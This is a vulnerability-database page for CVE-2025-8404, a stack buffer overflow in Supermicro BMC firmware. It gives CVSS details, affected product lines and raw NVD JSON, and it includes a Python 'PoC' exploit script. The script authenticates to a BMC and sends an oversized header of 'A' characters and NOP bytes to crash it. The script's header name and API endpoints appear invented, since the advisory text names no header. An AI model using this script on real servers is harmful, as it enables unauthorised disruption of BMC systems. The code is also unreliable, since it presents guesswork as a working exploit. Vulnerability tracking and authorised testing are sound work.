Security Vulnerability Report
中文
CVE-2025-8404 CVSS 5.5 MEDIUM

CVE-2025-8404

Published: 2025-11-18 08:15:52
Last Modified: 2026-04-15 00:35:42
Source: def9a96e-e099-41a9-bfac-30fd4f82c411

Description

Stack buffer overflow vulnerability exists in the Supermicro BMC Shared library. An authenticated attacker with access to the BMC exploit stack buffer via a crafted  header and achieve arbitrary code execution of the BMC’s firmware operating system.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Supermicro BMC 固件(受影响的版本需参考官方安全公告)
Supermicro X13系列服务器BMC固件(部分版本)
Supermicro H13系列服务器BMC固件(部分版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-8404 PoC - Supermicro BMC Stack Buffer Overflow Note: This is for educational purposes only. Use responsibly. """ import requests import sys def exploit_supermicro_bmc(target_ip, username, password): """ Exploit for Supermicro BMC stack buffer overflow via crafted header """ url = f"https://{target_ip}/api/session" # Authentication payload auth_data = { "username": username, "password": password } try: # Step 1: Authenticate to BMC session = requests.Session() response = session.post(url, json=auth_data, verify=False, timeout=10) if response.status_code != 200: print(f"[-] Authentication failed") return False print(f"[+] Authenticated successfully") # Step 2: Send malicious header to trigger buffer overflow # Overflow payload - long string to overflow stack buffer overflow_payload = "A" * 1024 + "\x90" * 100 headers = { "X-Overflow-Header": overflow_payload, "Cookie": f"SESSION_ID={session.cookies.get('SESSION_ID')}" } exploit_url = f"https://{target_ip}/api/bmc/info" response = session.get(exploit_url, headers=headers, verify=False, timeout=10) if response.status_code == 500: print(f"[+] Buffer overflow triggered - server error detected") return True print(f"[*] Request sent, check server status") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <target_ip> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_supermicro_bmc(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8404", "sourceIdentifier": "def9a96e-e099-41a9-bfac-30fd4f82c411", "published": "2025-11-18T08:15:51.783", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stack buffer overflow vulnerability exists in the Supermicro BMC Shared library. An authenticated attacker with access to the BMC exploit stack buffer via a crafted  header and achieve arbitrary code execution of the BMC’s firmware operating system."}], "metrics": {"cvssMetricV31": [{"source": "def9a96e-e099-41a9-bfac-30fd4f82c411", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "def9a96e-e099-41a9-bfac-30fd4f82c411", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://www.supermicro.com/zh_tw/support/security_BMC_IPMI_Nov_2025", "source": "def9a96e-e099-41a9-bfac-30fd4f82c411"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.